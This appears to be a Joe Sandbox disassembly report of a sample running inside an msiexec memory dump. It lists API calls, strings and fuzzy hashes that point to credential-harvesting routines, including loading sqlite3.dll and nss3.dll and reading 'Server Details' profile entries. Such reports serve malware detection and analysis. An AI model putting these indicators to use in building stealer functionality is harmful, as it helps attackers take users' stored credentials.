                                                                                          • API ID: memcpy$memset$memcmp
                                                                                          • String ID: Ul@
                                                                                          • API String ID: 270934217-715280498
                                                                                          • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                          • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                          • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                          • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                          APIs
                                                                                            • Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                          Strings
                                                                                          • recovered %d pages from %s, xrefs: 004188B4
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                          • String ID: recovered %d pages from %s
                                                                                          • API String ID: 985450955-1623757624
                                                                                          • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                          • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                                                          • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                          • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _ultoasprintf
                                                                                          • String ID: %s %s %s
                                                                                          • API String ID: 432394123-3850900253
                                                                                          • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                          • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                          • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                          • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                          APIs
                                                                                          • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                          • sprintf.MSVCRT ref: 0040909B
                                                                                            • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                            • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                            • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                            • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                            • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                            • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                            • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                          • String ID: menu_%d
                                                                                          • API String ID: 1129539653-2417748251
                                                                                          • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                          • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                          • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                          • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                          APIs
                                                                                          • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                            • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                            • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                          • _mbscat.MSVCRT ref: 004070FA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: _mbscat$_mbscpystrlen
                                                                                          • String ID: sqlite3.dll
                                                                                          • API String ID: 1983510840-1155512374
                                                                                          • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                          • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                          • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                          • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                          APIs
                                                                                          • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: PrivateProfileString
                                                                                          • String ID: A4@$Server Details
                                                                                          • API String ID: 1096422788-4071850762
                                                                                          • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                          • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                          • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                          • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                          APIs
                                                                                          • strlen.MSVCRT ref: 0040849A
                                                                                          • memset.MSVCRT ref: 004084D2
                                                                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,684F7B60,?,00000000), ref: 0040858F
                                                                                          • LocalFree.KERNEL32(00000000,?,?,?,?,684F7B60,?,00000000), ref: 004085BA
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeLocalmemcpymemsetstrlen
                                                                                          • String ID:
                                                                                          • API String ID: 3110682361-0
                                                                                          • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                          • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                          • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                          • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                          APIs
                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                          • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                          • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                          • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.1896731924.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpy
                                                                                          • String ID:
                                                                                          • API String ID: 3510742995-0
                                                                                          • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                          • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                          • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                          • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8